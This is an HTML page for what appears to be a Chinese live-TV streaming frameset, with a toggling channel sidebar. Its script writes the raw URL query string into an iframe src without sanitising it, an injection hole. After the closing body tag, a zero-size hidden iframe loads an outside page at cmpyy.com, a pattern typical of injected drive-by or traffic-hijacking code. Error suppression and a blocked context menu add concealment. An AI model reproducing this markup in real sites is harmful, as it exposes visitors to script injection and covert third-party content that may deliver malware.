<html>
<head>
<title>live</title>
<style type="text/css">
<!--
body {overflow:hidden;margin:0px;background-color: #000000}
a {color: #fff;text-decoration: none;text-align: center;outline: none;}
a:hover {color:#FFFFFF;text-decoration: none;}
.close {MARGIN: 0px}
.close a {BACKGROUND: url(images/c.gif) no-repeat;BORDER-TOP-WIDTH: 0px; BACKGROUND-POSITION: 0px 0px; DISPLAY: block; BORDER-LEFT-WIDTH: 0px; FLOAT: right; BORDER-BOTTOM-WIDTH: 0px; WIDTH: 9px; LINE-HEIGHT: 58px; HEIGHT: 58px; TEXT-ALIGN: center; BORDER-RIGHT-WIDTH: 0px}
.close a:hover {BACKGROUND-POSITION: -9px 0px;TEXT-DECORATION: none}
.open {MARGIN: 0px}
.open a {BACKGROUND: url(images/o.gif) no-repeat;BORDER-TOP-WIDTH: 0px; BACKGROUND-POSITION: 0px 0px; DISPLAY: block; BORDER-LEFT-WIDTH: 0px; FLOAT: right; BORDER-BOTTOM-WIDTH: 0px; WIDTH: 9px; LINE-HEIGHT: 58px; HEIGHT: 58px; TEXT-ALIGN: center; BORDER-RIGHT-WIDTH: 0px}
.open a:hover {BACKGROUND-POSITION: -9px 0px;TEXT-DECORATION: none}
#welcome a{color:red}
-->
</style>
<script language="JavaScript">
window.onerror = function(){return true}
function showsubmenu(clickis){
	whichEl = eval("tv_list");
	if (whichEl.style.display == "none") {
		eval("tv_list.style.display=\"\";");
		idFlag.innerHTML = "<div class='close'><a href='#' hidefocus='true' title='按此切换到精简模式'></a></div>";
		if(clickis==0) eval("sh.style.display=\"\";");
		try{
			if(window.frames["play"].lm_id == 1) window.frames["play"].showLeftMenu("9");
			window.frames["play"].yime()
		}catch(E){}
	}
	else {
		eval("tv_list.style.display=\"none\";");
		idFlag.innerHTML = "<div class='open'><a href='#' hidefocus='true' title='按此切换到正常模式'></a>";
		if(clickis==0) eval("sh.style.display=\"none\";");
		try{
			if(window.frames["play"].lm_id == 1) window.frames["play"].showLeftMenu("9");
			window.frames["play"].yime()
		}catch(E){}
	}
}
function keyDown(){
	var e = event?event:window.event;
	try{window.frames['tvl'].keyDown(e.keyCode)}catch(E){}
}
function getCookie(name) {
	var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
	if (arr != null) {return unescape(arr[2]);}
	return '';
}
</script>
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" oncontextmenu=window.event.returnValue=false onkeydown="keyDown();"><table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td height="100%"><iframe id="main" name="main" frameborder="0" src="main.html"  width="100%" height="100%" SCROLLING="NO" border="0" allowtransparency="true"></iframe></td><td id="sh" width="9" bgcolor="#171a1d" style="cursor:hand" onClick="showsubmenu(1)"><span id="idFlag"><div class="close" id="sh"><a href="#" hidefocus="true" title="按此切换到精简模式"></a></div></span></td><td width="255px" id="tv_list">
<script type="text/javascript" language="javascript"> 
var list=location.search;
list=list.substring(1,list.length);
document.write('<iframe id="tv1" name="tv1" frameborder="0" src="'+list+'"  width="100%" height="100%" SCROLLING="AUTO" border="0" target="main" allowtransparency="true"></iframe>');
</script></td>
</body>
<div style="display:none">
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_2402116'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s15.cnzz.com/stat.php%3Fid%3D2402116%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));</script>
</script>
<IFRAME id="" marginWidth=0 marginHeight=0 src="http://cmpyy.com/webyy.html" frameBorder="0" scrolling="0" width="0%"  height="0" allowTransparency></IFRAME>
</html>